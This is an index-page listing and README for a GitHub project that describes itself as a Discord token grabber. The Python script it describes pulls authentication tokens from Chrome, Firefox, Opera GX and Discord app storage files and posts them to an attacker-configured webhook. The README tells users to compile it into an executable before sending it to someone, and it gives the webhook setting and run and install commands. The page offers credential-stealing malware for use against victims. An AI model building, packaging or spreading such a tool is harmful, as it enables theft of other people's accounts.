Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/zentonik/easytokengrabber
script is designed to extract Discord tokens from storage files across browsers and the Discord desktop app.
https://github.com/zentonik/easytokengrabber
cheats discord grabber nitro token tokengrabber
Last synced: about 1 month ago
JSON representation
script is designed to extract Discord tokens from storage files across browsers and the Discord desktop app.
- Host: GitHub
- URL: https://github.com/zentonik/easytokengrabber
- Owner: zentonik
- License: mit
- Created: 2024-09-06T15:09:16.000Z (4 months ago)
- Default Branch: main
- Last Pushed: 2024-09-07T19:16:25.000Z (4 months ago)
- Last Synced: 2024-12-01T21:04:59.913Z (about 1 month ago)
- Topics: cheats, discord, grabber, nitro, token, tokengrabber
- Language: Python
- Homepage:
- Size: 9.77 KB
- Stars: 1
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# Discord Token Extractor and Logger
## YOU NEED TO MAKE THIS AN EXE FILE BEFORE SENDING IT TO SOMEBODY## Description
This Python script extracts Discord tokens from local storage files across various browsers and the Discord desktop application. It searches for tokens stored in `.ldb` and `.log` files and sends any found tokens to a specified Discord webhook for centralized logging or alerting.
## Supported Platforms
- **Google Chrome**
- **Mozilla Firefox**
- **Discord Desktop App**
- **Opera GX**## Features
- **Multi-Browser Support**: Extracts tokens from multiple browsers and the Discord desktop application.
- **File Handling**: Searches through `.ldb` and `.log` files.
- **Webhook Integration**: Sends extracted tokens to a Discord webhook.
- **Error Handling**: Reports any issues encountered during token extraction or webhook interaction.## Usage
1. **Update Webhook URL**: Replace the placeholder URL in the script with your actual Discord webhook URL.
```python
webhook_url = 'https://discord.com/api/webhooks/your_webhook_id/your_webhook_token'
```2. **Run the Script**: Execute the script using Python.
```bash
python main.py
```## Installation
1. **Clone the Repository**:
```bash
git clone https://github.com/zentonik/EasyTokenGrabber.git
cd EasyTokenGrabber
```2. **Install Dependencies**:
Ensure Python is installed, then install the required dependencies:
```bash
pip install requests
```